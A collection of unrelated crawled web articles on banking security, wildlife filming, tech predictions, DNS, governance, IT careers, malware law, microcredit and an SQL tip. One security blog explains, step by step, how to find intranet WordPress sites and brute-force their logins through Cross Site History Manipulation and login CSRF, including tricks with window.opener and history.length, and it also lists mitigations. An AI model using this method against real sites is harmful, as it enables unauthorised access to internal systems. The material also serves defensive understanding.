it becomes too much of a hassle to bank online no one's going to do it. So the big nut the banks, the FFIEC, the auditors, security vendors, analysts and market researchers are all trying to crack is what is "good enough" security--meaning, secure enough to actually protect people, without making the user experience so complicated that it drives them offline. It's not an easy question to answer. Gartner analyst Avivah Litan wrote a report highlighting the security flaws of cookie technology, stating that such a solution "... fosters consumer confidence but cannot be wholly relied on to effectively reduce fraud." She went on to say, "Online consumer service providers need a bifurcated strategy... one piece to build consumer confidence and another piece to keep the crooks out." Unfortunately, the Gartner report came out after many banks had already followed suit in order to meet the tight window imposed by the December 2006 FFIEC deadline. The irony of the FFIEC guidance is that, while it intends to ensure that banks do the right thing to protect online customers, it leaves more than enough rope for banks to hang themselves on security. Given the short timeframe banks had to comply and the wide variety of choices they had to sift through, it's conceivable that banks would lean towards cookie-based technologies. They're an improvement over what they had and cookies provide them with an FFIEC checkmark. However, at the risk of raising the already nauseating level of fear-mongering that's par for the course in the security industry, I encourage you not to throw the baby out with the bathwater. Last year MITM attacks were widely perceived as a strictly theoretical threat. In 2006, these "theoretical threats" crippled a bank in Europe and compromised a major U.S. bank (despite its use of tokens) along with several brokerages in Canada. Cookies, and even tokens, would have been useless in stopping these attacks. People are noticing. An August 2006 Gartner survey revealed that almost nine million US adults have stopped using online banking, while another estimated 23.7 million won't even start because of fears over security. How many more users would defect if they knew they were being scammed by the very people promising to protect them? It certainly blurs the line between the good guys and the bad guys, doesn't it? When the cookie crumbles, everyone loses. So why let it happen?
<urn:uuid:cfa5cf84-c49e-43df-8c46-9b9488fea98d>
CC-MAIN-2017-04
http://www.banktech.com/cookie-based-security-creates-false-sense-of-online-banking-security/d/d-id/1291467
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560283301.73/warc/CC-MAIN-20170116095123-00047-ip-10-171-10-70.ec2.internal.warc.gz
en
0.966932
1,069
2.578125
3
Filming animals in the wild is notoriously difficult, as documentary makers can spend weeks waiting for that elusive shot. Filming outdoors, in typically difficult surveillance conditions presents an extra challenge, and since many animals travel or feed under the cover of darkness, film crews need to make sure the footage they capture at night is every bit as dynamic and effective as that they capture during the day. The BBC recently aired a documentary entitled "Great Rift." The program focuses on the diverse wildlife in Africa's vast Great Rift Valley and in particular on a troop of approximately 100 baboons who have made their homes inside hollow volcanic lava tubes along the rift. These lava tubes protect for the baboons from predators, particularly big cats which will prowl the baron landscape in search of prey. Filmed in June 2009, the BBC crew used 10 of Bosch's IR illuminators for the Great Rift documentary. The crew installed the illuminators inside the lava tubes when the baboons left to feed, then crawled inside and awaited their return. Working in such dark and cramped conditions proved quite a challenge, but the illuminators made the film crew's commitment worthwhile, enabling them to capture previously unseen video footage of baboons in their natural habitat. As an added bonus the crew were also able to film the nocturnal behavior of a large colony of bats which also inhabit the lava tubes. Bosch's illuminators were selected because they are compact and discreet and powerful enough to enable broadcast quality night-time filming. Series Producer Phil Chapman said, "With HD programs like Great Rift, image quality is all important. The degree of detail in our IR material was outstanding, you can see the fine detail of the baboons' fur and even tiny parasites crawling on the foot of a baby bat."
<urn:uuid:1101c583-ef71-46a1-b166-95e347c3072d>
CC-MAIN-2017-04
https://www.asmag.com/showpost/9484.aspx
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280485.79/warc/CC-MAIN-20170116095120-00259-ip-10-171-10-70.ec2.internal.warc.gz
en
0.961255
361
2.828125
3
IBM predicts five innovations that will change our behaviour over the next five years. As 3D and holographic cameras get more sophisticated and miniaturized to fit into mobile phones, people will be able to interact with photos, browse the web and chat with friends in the form of 3D holograms. By submitting your personal information, you agree that TechTarget and its partners may contact you regarding relevant content, products and special offers. Scientists are working to improve video chat to become holography chat - or "3-D telepresence". The technique uses light beams scattered from objects and reconstructs them into a picture of that object. Batteries that react to the environment Instead of the heavy lithium-ion batteries used today, scientists are working on batteries that use the air we breath to react with energy-dense metal. If successful, the result will be a lightweight, powerful and rechargeable battery capable of powering everything from electric cars to consumer devices. These would lead to the development of battery-free electronic devices that can be charged using a technique called energy scavenging. Some wrist watches already use this - they require no winding and charge based on the movement of your arm. The same concept could be used to charge mobile phones for example - just shake and dial. Rise of the 'citizen scientist' Sensors in phones, cars, wallets and even tweets will collect data that will give scientists a real-time picture of environments. Simple observations such as when the first thaw occurs and when mosquitoes first appear, for example, will provide a rich resource in datasets. Laptops will even be used to detect seismic activity. If connected to a network of other computers, this will help to map the aftermath of an earthquake quickly, speeding up the work of emergency responders and potentially saving lives. Personalised commuter information Advanced analytics will personalise recommendations for commuters, so they will be directed where to go in the fastest time. Adaptive traffic systems will intuitively learn traveller patterns and behaviour to provide more dynamic travel safety and route information to travellers than isavailable today. IBM researchers are developing new models that will predict the outcomes of varying transportation routes to provide information that goes beyond traditional traffic reports, after-the fact devices that only indicate where you are already located in a traffic jam, and web-based applications that give estimated travel time in traffic. Computers will help to energize your city The energy poured into the world's data centres could be recycled for a city's use to combat the excessive heat and energy that they give off. Up to 50% of the energy consumed by a modern data centre goes toward air cooling. Most of the heat is then wasted because it is just dumped into the atmosphere. But new technologies, such as on-chip water-cooling systems, mean that the thermal energy from a cluster of computer processors can be efficiently recycled to provide hot water for an office or houses. Watch the video
<urn:uuid:e169a19a-e5d6-4ade-a08f-0dac9c49f5ff>
CC-MAIN-2017-04
http://www.computerweekly.com/news/1280094633/Five-life-changing-innovations-for-the-next-five-years
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560283475.86/warc/CC-MAIN-20170116095123-00469-ip-10-171-10-70.ec2.internal.warc.gz
en
0.926091
607
3.1875
3
Statistics from w3techs suggest that 1 out of 4 websites (around 25%) on the internet are powered by WordPress. WordPress’ popularity is derived from its ease of setup and use, its contributing community, and the big repertoire of plugins and themes that are available. Why is WordPress Such a Common Target? Even though WordPress is a beginner friendly web application, like every other platform it has its own issues and limitations. One of the most voiced security issues is that it is possible and very easy to bruteforce login credentials. WordPress’ advice on this is to install a security plugin, protect the WordPress login page with a .htpasswd file (HTTP authentication), and of course use strong credentials. However many users, especially the unexperienced ones do not take these extra security measures onboard. They use very weak credentials and do not setup any additional layers of security on their websites, thus making WordPress a good target for brute force attacks. How to Bruteforce WordPress Websites and Blogs Running on an Internal Networks and Behind Firewalls WordPress blogs aren’t always used for publicly accessible websites. They are also frequently used as websites in intranets for employees. Typically Intranets are not reachable from the outside (the internet) because they are sitting behind a firewall. Though WordPress websites running in intranets are still at risk; attackers can effectively brute force a WordPress blog or website in an internal network via XSHM, without having direct access to it. What is XSHM? XSHM is an abbreviation for Cross Site History Manipulation. It is a security breach in the Same Origin Policy, which is used by web browsers to prevent different websites from retrieving information from each other when a user is accessing them both. This means that website A can not read the content of website B when both are accessed at the same time in different browser tabs. However, there are some side channel attacks that can be used to leak certain information even though the same origin policy is in place. XSHM is one of them and below is an example: - An attacker creates an iframe on a website he controls (website A) and points it to a page on website B that has a conditional redirect. For example the iframe points to login.php, which when accessed redirects the user to index.php if he is logged in. - The attacker retrieves the history.length value of the browser tab. - The attacker updates the iframe to point to index.php. - When the user accesses the iframe again, the attacker retrieves the new value of the history.length property again and compares it to the one in step 2. Since the web browser does not increase the history.length value if the URL the iframe is the same as the URL the user is currently browsing, then it is easy to determine if the user is logged into WordPress or not. Therefore if the history.length value remains the same, it means that the user was redirected to index.php, which means he is logged in. How to Identify WordPress Websites on a Local Network WordPress has a unique redirect, that makes it really easy for attackers to spot. If a user is not logged in and visits the page /wordpress/wp-admin/, he is redirected to: Therefore to find WordPress websites on an internal network an attacker can send the victim a link with a XSHM payload, that tries the above redirect on a range of internal IP addresses such as 192.168.1.1/24 when a user clicks the link. How does bruteforcing WordPress logins work with XSHM? Now that the attacker identified the WordPress websites he can start the brute force attacks with XSHM, even though he does not have direct access to it. This is possible due to the fact that WordPress does not have a token to prevent logins via CSRF. There is a general misunderstanding of whether or not CSRF Tokens are necessary in login forms. Note: Tokens in login pages are necessary. It is generally advised to secure your WordPress login page with Tokens to prevent these type of attacks. There are several other attack vectors that use the login CSRF as entry points, which are not obvious but can have serious impacts, such as logging the user in an attacker’s account without his knowledge and steal private information. It might also be possible to abuse an otherwise not reachable Stored Cross-site Scripting (XSS) vulnerability. WordPress also provides a redirect_to form field in its login, which lets the attacker specify where he wants the victim to be redirected after a successful login. This suits perfectly the attacker’s XSHM attack. He can now use a website which makes a CSRF attack based on GET parameters and supply different username / password combinations. The attack works as follows: - Retrieve the value of the history.length property of the victim’s browser tab. - Point the src of the iframe to the page that carries out the CSRF attack. This can be done by using a self-submitting form to the wp-login page with a username / password combination. - Point the iframe to the path from the redirect_to parameter - Check the value of the victim’s history.length From the value of the history.length property the attacker can now tell whether or not the attack was successful, because the attacker knows that a successful login means that wordpress redirected the user to the page in the redirect_to parameter. Therefore if the value of the history.length property does not increase, he knows that the attack was successful. The attacker is also able to tell if a CSRF attack worked under certain conditions, which usually isn’t possible due to Same Origin Policy. Proof of Concept Video Below is a proof of concept video of how WordPress websites running on internal networks can be identified, even when running behind a firewall, and how then a bruteforce attack is launched against them. Limitations and Problems of the WordPress Login Page Attack via XSHM The Attack is Easily Noticed In order for this WordPress attack to succeed the attacker needs at least two interactions from the victim: - First he must convince the victim to visit his malicious web page. - After that the victim must click a button or link on the attacker’s page that opens a new browser window or tab. This is required since it is not possible to open a new window or tab without user interaction, because of popup blockers. Since the victim can easily notice the new opened tab and the page refreshes the chances of the victim not noticing the attack are very slim. Also, the attacker can’t just create a simple iframe as the wp-login page is secured with X-Frame-Options. This might cause problems in some web browsers since they might not increase the history.length value if this header is set, thus could be very difficult for an attacker to determine if there is a WordPress or not. Different Browsers' Behaviour Complicates Matters Another problem is that some browsers such as Chrome always change the value of the history.length property, even if the attacker redirects the iframe to its current src. This might be a counter measure for the XSHM attack, and in fact the attack will fail. So how can the attacker change the history.length without an iframe on the current page? Using Window.Opener in the XSHM Attack - Open a child window from his page, for example attacker.com/opener.html -> attacker.com/child.html - In the child window the attacker uses the opener.history.length to retrieve the history length from attacker.com/opener.html - Set the location of the opened window to http://192.168.1.123/wordpress/wp-admin/ using opener.location - Set window.opener.location to http://192.168.1.123/wordpress/wp-login.php?redirect_to=http%3A%2F%2F192.168.1.123%2Fwordpress%2Fwp-admin%2F&reauth=1 - Set opener.location back to attacker.com/opener.html to be on the same origin again. Now the attacker should be able to get the value of opener.history.length again and compare it to the one from step 2. This way the attacker can also bypass the X-Frame-Options protection against XSHM. This could also be stealthily done by using a popunder window. The Maximum Value of the history.length Property Another problem that might hinder these type of attacks is the maximum value of the history.length property. For example on Chrome its highest value can be 50. If the value needs to be increased and it is already at 50, the first (oldest) entry is removed and the last entry is added. This can be a problem when doing a Cross Site History Manipulation attack, but as a workaround the attacker can: - Trick the victim into visiting a url from the same origin with window.opener.location. - Then trick the victim again to navigate back to the first page he visited in the current session with window.opener.history.go(- (window.opener.history.length-1)). This first retrieves the amount of pages the user can go back and then goes back to the first page. - Set the URL to a new link. The history value is 2 now. This way the attacker bypasses the problem of the 50 entries limit. Dealing with Logout CSRF Protection Another hurdle for the XSHM attack is the logout CSRF protection. If the user is logged in the attacker usually can’t reliably check whether or not there is an actual WordPress installation on the server, so he can’t brute force the login page with a user that is already logged in. Well WordPress is a little special in this case. When the victim visits wp-login.php he is greeted with a login prompt whether or not he is logged in. This would solve the problem the attacker would have with bruteforcing credentials, however it is still not possible to reliably check with wp-login / wp-admin if there is a WordPress installation on the web server. But WordPress has an additional parameter you can set to actually log you out when you visit wp-login. It is called reauth. When it is set to 1 you are automatically logged out, which means the attacker can try to point the victim to wp-admin and see if it redirects him to wp-login again. How can You mitigate against the XSHM Attack? As a WordPress user you can’t take any precautions to prevent XSHM attacks, since this is a browser feature you can’t control. You can only rely on the developers of the respective website to take all the necessary precautions that prevent XSHM attacks. These include: - Avoiding conditional redirects that can leak sensitive information. - Using of CSRF Tokens. It can also be a good idea to add random characters to the URL. These don’t have to be connected to any application level logic, like CSRF tokens do, but can make it difficult for an attacker to guess the exact link where the victim will be redirected to. Note: While there is a proof of concept for this WordPress attack it is unlikely to be used in a real life scenario because of the knowledge that is required about the target and because of the long time the victim has to spend on the attacker’s page, while having a refreshing window in plain sight.
<urn:uuid:95358b5a-1e63-4c3a-801b-9f6373afddc4>
CC-MAIN-2017-04
https://www.netsparker.com/blog/web-security/bruteforce-wordpress-local-networks-xshm-attack/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280266.9/warc/CC-MAIN-20170116095120-00039-ip-10-171-10-70.ec2.internal.warc.gz
en
0.908271
2,447
2.9375
3
Anyone who uses the Internet to send an E-mail or browse the Web uses the Domain Name System (DNS) without even realizing it. DNS is an incredibly important, but completely hidden, part of the Internet. The DNS forms one of the largest and most active distributed databases on the planet. Without DNS, the Internet would grind to a halt very quickly. When you use the Web or send an E-mail message, you use a domain name to do it. For example, the URL http://www.bicycleshop.com contains the domain name bicycleshop.com. So does the e-mail address sales@ bicycleshop.com. Human-readable names like bicycleshop.com, though easy for people to remember, do not provide the necessary IP address information the machines use to communicate with each other. The DNS allows you to connect to another networked computer or remote service by using its user-friendly domain name rather than its numerical IP address. Every time you use a domain name, you use the Internet’s DNS to translate the human-readable domain name into the machine-readable IP address. During a day of browsing and e-mailing, you might access these servers hundreds of times! As a CCNA or CCNP, it is vital that you be able to install, configure, maintain, and troubleshoot the various operational areas of the DNS system, both locally and, possibly, on a world-wide level. In this post, we’ll take a look at the DNS in more detail so you can understand how it works and appreciate its amazing capabilities. As we have been discussing, DNS translates domain names to IP addresses. This process sounds like a relatively simple task. And it would be, except for five factors: - There are currently billions of IP addresses in use. And, most machines have a human-readable name as well. - There are many billions of DNS requests made every day. A single user can easily make a hundred or more DNS requests a day. Compounding that fact, there are hundreds of millions of people and machines using the Internet daily. - Domain names and IP addresses change daily. - New domain names get created daily. - Millions of people do the work to change and add domain names and IP addresses every day. The DNS is basically a database, and no other database on the planet gets this many requests. Additionally, no other functional database currently in use has millions of people changing it every day. These factors are what make the DNS so unique. There are some additional factors that impact the DNS process that must be considered. Remember that every device that has a presence on the Internet must have its own unique IP address. Some of the basic rules of IP address assignment dictate that a server usually has a static IP address that does not change very often. On the other hand, a home machine that is connecting through a modem often has an IP address that is dynamically assigned by the Internet Service Provider (ISP) when you log in. That IP address is unique for your session and may be different the next time you log in. In this way, an ISP only needs one IP address for each modem it supports, rather than for every customer. It should be noted that as far as the machines on the Internet are concerned, an IP address is all that you need to connect to a server. For example, you can type http://184.108.40.206 in your browser and you will arrive at a machine that contains a Web site such as Bicycleheaven.Com. Domain names are strictly a human convenience. To serve requests for resolution, DNS uses the User Datagram Protocol (UDP) header at Layer 4 of the OSI model. In addition, the DNS functions on port number 53 of the OSI model. DNS queries consist of a single UDP request from the client followed by a single UDP reply from the server. The Transmission Control Protocol (TCP) is used when the response data size exceeds 512 bytes or for tasks such as inter-zone transfers. In addition, some operating systems, such as HP-UX, are known to have resolver implementations that use TCP for all queries, even when UDP would suffice. In my next post, we will examine some of the more technical aspects of the DNS process. Author: David Stahl
<urn:uuid:67faa270-bd9e-454e-81ae-4d3f16bc4643>
CC-MAIN-2017-04
http://blog.globalknowledge.com/2010/04/20/revisiting-the-domain-name-system-dns-part-2/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284376.37/warc/CC-MAIN-20170116095124-00157-ip-10-171-10-70.ec2.internal.warc.gz
en
0.937449
897
3.171875
3
The principles of corporate governance are a collection of non-binding values that have been drafted to provide useful guidance to a business in terms of their business activities and association with their stakeholders. Following these principles will help a firm improve itself in terms of following the legal rules and regulations of business activities and turning itself into a more ethical firm. The key corporate governance principles are described below. This is the most basic and initial step that companies should take. Board of directors and company officials should build a proper corporate governance structure and delegate duties and authorities to everyone till the last level of the hierarchy. Ensure that all the employees in the organization understand their duties and the amount of flexibility and decision-making power that has been allotted to them. This will make it easier to monitor employees and their progress as well as identify employees who are not fulfilling their responsibilities. This implies that shareholders belonging to the same class will receive equal treatment. They will be given all the rights that they have been promised. Some of the fundamental rights of shareholders include voting in shareholder meetings, receiving information and feedback about necessary changes required for the firm, transferring shares, obtaining relevant business material regularly and election or exclusion of board members. Stakeholders focus on the development of employees and keep an eye on the company with regard to their compliance of established regulations. They are responsible for reporting any unethical actions that take place in the firm or any concerns regarding it. Moreover, stakeholders alert creditors and shareholders of the company in case the company is at a risk of insolvency or if the firm is unable to pay their dues on time. This will ensure that the company is complying with all rules and regulations and is not indulging in unethical business practices. As a result of this, employee performance and productivity will also increase as employees will be aware of working in an ethical environment. To implement good corporate governance in the firm, it needs to adhere to the full disclosure principle which necessitates the company to disclose or publicly reveal all ownership and shareholder rights, company’s financial statements, the business objectives of the company and the amount of salary paid to the key executives of the company. The company is also obligated to reveal its corporate governance policies, accounting procedures and risk factors relevant to the company’s business activities. Mostly, such information is mentioned in the annual reports of firms. Companies that are more transparent and follow the best practice principles of good corporate governance are usually liked by shareholders and customers. Customers prefer buying products or services of an ethical company as they are aware of its importance. Employees too, like working in such companies as they know that they will be given their appropriate rights and that their health and safety will be taken care of in the workplace environment.
<urn:uuid:44f3cc2f-df72-41f8-b355-65b22c08d37d>
CC-MAIN-2017-04
http://www.best-practice.com/compliance-best-practices/corporate-compliance/the-key-principles-of-corporate-governance/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282932.75/warc/CC-MAIN-20170116095122-00359-ip-10-171-10-70.ec2.internal.warc.gz
en
0.965755
545
2.84375
3
The Internet allows an individual to either inadvertently or purposely disseminate malware (such as a virus) to other systems globally. The potential impact could encompass the “infection” or compromise of millions of hosts. This has occurred. A “harmless experiment” by Cornell University student Robert Morris involved the release onto the Internet of a type of malware called a “worm” that compromised over 6,000 computers and required millions of dollars worth of time to eradicate. As several “non-public computers” run by the US Government were damaged , Morris was prosecuted under the US Computer Fraud and Abuse Act (CFAA). He was convicted notwithstanding his declaration that he had no malicious objective to cause damage. It is probable a service provider or content hosting entity will face a degree of liability dependent on intention. If malware is intentionally posted such as in the Morris’ case, no uncertainty as to whether the conception and insertion of the malware was deliberate exists. Morris stated he did not intend harm, but the fact remained that he intentionally created and released the worm. In the United States both Federal and State legislation has been introduced to deal with the intentional formation and release of malware. In the UK, the introduction of malware is covered by section 3 of the Computer Misuse Act . The Act states that a crime is committed if a person “does any act which causes an unauthorized modification of the contents of any computer” and the perpetrator intends to “cause a modification of the contents of any computer” which may “impair the operation of any computer”, “prevent or hinder access to any program or data held in any computer” or “impair the operation of any such program or the reliability of any such data”. The deliberate introduction of any malware will meet any of these requirements by taking memory and processing from the system and feasibly damaging the system. It is also necessary for a successful prosecution to demonstrate a “requisite knowledge”. This “is knowledge that any modification he intends to cause is unauthorized”. With the volume of press coverage concerning the damage that can be caused by malware and the requirements for authorization, it is highly unlikely an accused party would be able to successfully argue ignorance as to authorization. Malware is generally distributed unintentionally subsequent to its initial creation. Thus an ICP or an ISP would not be found criminally liable under either the Computer Fraud and Abuse Act or the Computer Misuse Act for most cases of dissemination. For the majority of content providers on the Internet, there exists no contractual agreement with users browsing the majority of sites without any prospect of consideration. The consequence being that the only civil action that could succeed for the majority of Internet users would be a claim brought on negligence. Such a claim would have to overcome a number of difficulties even against the primary party who posted the malware let alone going after the ISP. It would be necessary to demonstrate the ISP is under a duty of care. The level of care that the provider would be expected to adhere to would be dependent on a number of factors and a matter for the courts to decide and could vary on the commerciality of the provider and the services provided. The standard of due care could lie between a superficial inspection through to a requirement that all software is validated using up-to-date anti-virus software on regular intervals with the court deciding dependant on the facts of the initial case that comes before the courts. The duty of care is likely to be most stringently held in cases where there is a requirement for the site to maintain a minimum standard of care, such as in the case of a payment provider that processes credit cards. Such a provider is contractually required to adhere to the PCI-DSS as maintained by the major credit card companies and would consequently have a greater hurdle in demonstrating that they were not negligent in not maintaining an active anti-virus program. Loss of an entirely economic nature cannot be recovered through an action for negligence under UK law. There is a requirement that some kind of “physical” damage has occurred. The CIH or Chernobyl virus was known to overwrite hard-drive sectors or BIOS. This could in some cases render the motherboard of the host corrupt and unusable. In this instance the resultant damage is clearly physical; however, as in the majority of Internet worms , most impact is economic in effect. Further, it remains undecided as to whether damage to software or records and even the subsequent recovery would be deemed as a purely economic loss by the courts. It may be possible to initiate a claim using the Consumer Protection Act in the UK and the directives enforced within the EU . The advantage to this approach is the act does not base liability on fault. It relies on causation instead of negligence in determining the principal measure of liability. The act rather imposes liability on the “producer” of a “product”. A “producer” under the act includes the classification of importer, but this definition would only be likely to extend to the person responsible for the contaminated software such as the producer or programmer. It also remains arguable as to whether software transmitted electronically forms a “product” as defined under the act. Computer Fraud and Abuse Act (CFAA), 18 U.S.C. 1030; There is an obligation for prosecution under the CFAA that a non-public computer is damaged where the term “damage” means any impairment to the integrity or availability of data, a program, a system, or information. Computer Misuse Act 1990 (c. 18), 1990 CHAPTER 18 The PCI-DSS at section 5 requires that “Anti-virus software must be used on all systems commonly affected by viruses to protect systems from malicious software.” Scandariato, R.; Knight, J.C. (2004) “The design and evaluation of a defence system for Internet worms” Proceedings of the 23rd IEEE International Symposium on Reliable Distributed Systems, 2004. Volume, Issue, 18-20 Oct. 2004 Page(s): 164 - 173 The Consumer Protection Act 1987 (Product Liability) (Modification) Order 2000 (Statutory Instrument 2000 No. 2771) See also, Electronic Commerce (EC Directive) Regulations 2002, SI 2000/2013 and the provisions of the Product Liability Directive (85/374/EEC) About the Author: Craig Wright is the VP of GICSR in Australia. He holds both the GSE, GSE-Malware and GSE-Compliance certifications from GIAC. He is a perpetual student with numerous post graduate degrees including an LLM specializing in international commercial law and ecommerce law, A Masters Degree in mathematical statistics from Newcastle as well as working on his 4th IT focused Masters degree (Masters in System Development) from Charles Sturt University where he lectures subjects in a Masters degree in digital forensics. He is writing his second doctorate, a PhD on the quantification of information system risk at CSU.
<urn:uuid:ef00ec30-6b9d-40fa-8908-e108af0c4286>
CC-MAIN-2017-04
http://www.infosecisland.com/blogview/16567-What-the-Law-Says-about-Distributing-a-Virus-or-Malware.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280065.57/warc/CC-MAIN-20170116095120-00086-ip-10-171-10-70.ec2.internal.warc.gz
en
0.947348
1,453
2.71875
3
Who would have thought that a bank -- that capitalist economic icon -- and the poorest residents of the world's most impoverished country could create an idea that changed the world? And yet this is the story of microcredit -- a concept that began in Bangladesh and spread across the globe. While businesspeople may tend to ignore grand ideas for world peace, an end to poverty or discrimination, they are often scorned as purely "profit-motivated," looking out for their own interests and disinterested in society's larger issues. While there's nothing wrong with pursuing profit or articulating large-scale goals for social betterment, neither mode can create significant societal change. Luckily our world has a few individuals who combine care of their fellows with a tough, business-minded drive to get things done. Mohammad Yunus -- the Nobel Peace Prize winner in 2006 -- is one such person. Yunus started Grameen Bank in Bangladesh in 1976 with $27 of his own money. Specializing in small, unsecured business loans to the poor, the bank has loaned $5.95 billion to 12 million borrowers. These unsecured loans -- with no punishment for default -- have been repaid at a 99 percent recovery rate, and 59 percent of borrowers have risen above the poverty line in their areas. The bank also has been profitable almost every year since 1983 and has used those profits to give scholarships to more than 34,000 children, and fund housing and college loans, life insurance, pensions and other programs. And 89,000 beggars have participated in a Grameen-run job program. The bank is now primarily owned by its borrowers -- mostly women -- and the microcredit concept spread worldwide, helping an estimated 80 million of the world's 1 billion people who live on less than $1 per day. From Yunus' genius comes bright ideas such as the Village Phone. A small loan allows someone to buy a cell phone in a region with no wired telecommunications service. The village phone owner charges others a small fee to make phone calls; the owner repays the loan and makes a profit. The village for the first time has telecommunications service, and other businesses spring up around that new technology. By the late 1990s, 60,000 "telephone ladies" were providing telecommunications services in 80 percent of Bangladesh's villages. In addition to the phone program, Grameen has also funded fish farms, knitwear factories and other traditional enterprises. While Yunus hasn't yet -- as he says -- "put poverty in a museum," he has a plan and it's working. And the microcredit concept has broader implications for governments, the private sector and nongovernmental organizations. None alone can obliterate all of society's problems, but with an entrepreneurial spirit like Yunus', something can be done. In his article, Social Business Entrepreneurs Are the Solution, Yunus says when things go wrong, it is often not "market failure" but "conceptualization failure." "When we presented the Village Phone Project to the professional people," said Yunus in a 1998 speech, "they expressed serious doubt about the capacity of the illiterate women to understand this state-of-the-art telecommunication technology. They argued that the poor women are good only for handling traditional activities, such as raising chicken and cow, making baskets, selling vegetables. 'It is ridiculous to think about telecommunication business for people who have never seen a telephone, or even electricity.'" But Yunus had no conceptualization failure. "We remained thoroughly convinced that while people may be poor and illiterate, they are not stupid. Potentially they are as smart as anybody else in the world." That bodes well for the developing world, and also for the public sector as it learns to govern using a digital platform. As the telephone ladies bring infrastructure to the remotest villages, governments -- and their partners -- have more options to deliver services electronically. And the more people government can serve, the more chances exist for citizens to receive critical services, such as education and health care. Yunus saw potential where others saw only poverty, and invested in it. As a result, millions worldwide have begun to climb the economic ladder.
<urn:uuid:3af4e838-deb2-4cc8-99c8-081c9e2bce61>
CC-MAIN-2017-04
http://www.govtech.com/magazines/pcio/Can-We-Put-Poverty-in-a.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282937.55/warc/CC-MAIN-20170116095122-00204-ip-10-171-10-70.ec2.internal.warc.gz
en
0.965802
860
2.734375
3
In this course you will learn about the benefits, the architecture, the requirements and limitations of vSphere Data Protection. We will cover the deployment and configuration of vSphere Data Protection. This is followed by demonstration of the creation of backup jobs, backup data replication and application backup configurations. You will then learn about restoring virtual machines, performing File Level Restore and how to perform vSphere Data Protection Emergency Restore. Next, you’ll learn about the benefits and the architecture of vSphere Replication. We will also cover the deployment and configuration of the vSphere Replication Appliance, as well as the setting of a Disaster Recovery site to act as a vSphere Replication target. Finally, you will learn how to configure replications and how to recover virtual machines.
<urn:uuid:8e059da2-87c1-45b1-b8e8-9a4d8c1a9a2e>
CC-MAIN-2017-04
https://streaming.ine.com/c/ine-vsphere6-data-protection-replication
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285315.77/warc/CC-MAIN-20170116095125-00112-ip-10-171-10-70.ec2.internal.warc.gz
en
0.923696
153
2.609375
3
The IT industry is losing out on new talent because schools and universities are not providing the information that students need to make informed career choices, a survey has found. In a survey of 1,056 students at higher education institutions across the UK, CompTIA, the IT trade association, found that just 13% felt that their institution had fully equipped them to make career decisions. Although nearly a fifth (18%) of students said they were interested in working in IT or technology, and 23% said they might be interested if they knew more about the careers, nearly half (41%) did not feel they were well-informed about the range of careers open to them. "There is plenty of potential interest, but the lack of information means a huge number of technology jobs remain unfilled and motivated graduates remain unemployed unnecessarily," said John McGlinchey, VP of Europe and Middle East sales operations at CompTIA. It also predicted that employment in the IT industry would grow at 2.19% a year over the next decade, which translates into more than half of a million new IT and telecoms professionals needed over the next five years. CompTIA's survey found that 36% of students assume they need an IT or related degree to work in the industry. While this is true for certain areas, such as programming, the association said that industry training and certifications have proven to be successful entry routes for non-technological graduates in many other areas of IT. Other misconceptions students had about IT included the belief that the job involved sitting in a back room with little or no social contact. Kevin Streater, executive director for IT Intelligence at the Open University, said: "For far too long there has been a false assumption that IT is too technical for most people to get into. "The reality is that anyone who is educated, motivated and passionate about technology should consider a career in the industry. At its core, it is very much a career where you can keep learning, keep developing and keep your hands on technology." This story, "Lack of career information means IT industry loses out, says CompTIA" was originally published by Computerworld UK.
<urn:uuid:ce9fb75c-083d-4da3-acc0-41ae945adf42>
CC-MAIN-2017-04
http://www.itworld.com/article/2732234/it-management/lack-of-career-information-means-it-industry-loses-out--says-comptia.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279224.13/warc/CC-MAIN-20170116095119-00022-ip-10-171-10-70.ec2.internal.warc.gz
en
0.977882
446
2.578125
3
Use SQL to Remove Extra Spaces October 11, 2006 Ted Holt The SQL sorting tip you published on September 13 was a good one. I had seen a similar tip written by Craig Mullins in Quest Software’s Pipeline Newsletter. Mullins had two other interesting tips on the same page. I thought your readers might like to see them as well. The Web page to which Tom refers is at http://www.quest-pipelines.com/newsletter-v7/0606_F.htm. Craig Mullins uses the technique about which I wrote to sort data on three-letter day abbreviations. Another tip he presents involves using the REPLACE function to remove extra spaces within a character string. IBM added the REPLACE function to SQL in V5R3. I ran the following query to see what would happen, and it worked like a charm. select name, replace(replace(replace(name,' ','<>'),'>',' ') from qtemp/mydata Here’s what I saw: NAME REPLACE Joe Smith Joe Smith Joe Smith Joe Smith Joe Smith Joe Smith Joe Smith Joe Smith Joe Smith Joe Smith Joe Smith Joe Smith So how does it work? The innermost REPLACE changes all blanks to a less-than greater-than pair. So, if there are three spaces between Joe and Smith, the innermost REPLACE returns Joe<><><>Smith. The middle REPLACE changes all greater-than less-than pairs to the empty string, which removes them. Joe<><><>Smith becomes Joe<>Smith. The outer REPLACE changes all less-than greater-than pairs to a single blank. Joe<>Smith becomes Joe Smith. Clever! You do not have to use the less-than and greater-than symbols. Any two characters that are not used in the field will work. As for the other technique, I did not quite catch Craig Mullins’ drift, but maybe it was the example he gave.
<urn:uuid:b8df3a6e-e586-423d-a510-2c299865f45c>
CC-MAIN-2017-04
https://www.itjungle.com/2006/10/11/fhg101106-story02/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280425.43/warc/CC-MAIN-20170116095120-00416-ip-10-171-10-70.ec2.internal.warc.gz
en
0.918816
418
2.65625
3
